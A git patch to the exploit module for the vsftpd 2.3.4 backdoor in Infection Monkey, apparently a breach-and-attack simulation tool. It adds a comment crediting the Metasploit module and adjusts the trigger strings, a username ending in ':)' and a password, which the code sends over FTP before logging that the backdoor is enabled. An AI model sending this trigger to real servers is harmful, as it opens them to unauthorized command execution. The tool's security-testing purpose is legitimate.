From 38d8146c985d309a19d993ad9c2f83102c1962fa Mon Sep 17 00:00:00 2001 From: Dhayalan Date: Wed, 22 May 2019 16:06:42 +0200 Subject: [PATCH] Update vsftpd.py Added information about the exploit at the top, and made slight change to the format of the string USERNAME & PASSWORD --- monkey/infection_monkey/exploit/vsftpd.py | 15 +++++++++++---- 1 file changed, 11 insertions(+), 4 deletions(-) diff --git a/monkey/infection_monkey/exploit/vsftpd.py b/monkey/infection_monkey/exploit/vsftpd.py index 10a5d94ec..785b316a1 100644 --- a/monkey/infection_monkey/exploit/vsftpd.py +++ b/monkey/infection_monkey/exploit/vsftpd.py @@ -1,3 +1,10 @@ +""" + Implementation is based on VSFTPD v2.3.4 Backdoor Command Execution exploit by metasploit + https://github.com/rapid7/metasploit-framework/blob/master/modules/exploits/unix/ftp/vsftpd_234_backdoor.rb + only vulnerable version is "2.3.4" +""" + + import StringIO import logging import paramiko @@ -22,8 +29,8 @@ RECV_128 = 128 # In Bytes UNAME_M = "uname -m" ULIMIT_V = "ulimit -v " # To increase the memory limit UNLIMITED = "unlimited;" -USERNAME = b'USER D3fa1t:)\n'# Ftp Username -PASSWORD = b'PASS please\n' # Ftp Password +USERNAME = b'USER D3fa1t:)' # Ftp Username should end with :) to trigger the backdoor +PASSWORD = b'PASS please' # Ftp Password FTP_TIME_BUFFER = 1 # In seconds class VSFTPDExploiter(HostExploiter): @@ -65,9 +72,9 @@ class VSFTPDExploiter(HostExploiter): if self.socket_connect(ftp_socket, self.host.ip_addr, FTP_PORT): ftp_socket.recv(RECV_128).decode('utf-8') - if self.socket_send_recv(ftp_socket, USERNAME): + if self.socket_send_recv(ftp_socket, USERNAME + '\n'): time.sleep(FTP_TIME_BUFFER) - self.socket_send(ftp_socket, PASSWORD) + self.socket_send(ftp_socket, PASSWORD + '\n') ftp_socket.close() LOG.info('Backdoor Enabled, Now we can run commands') else: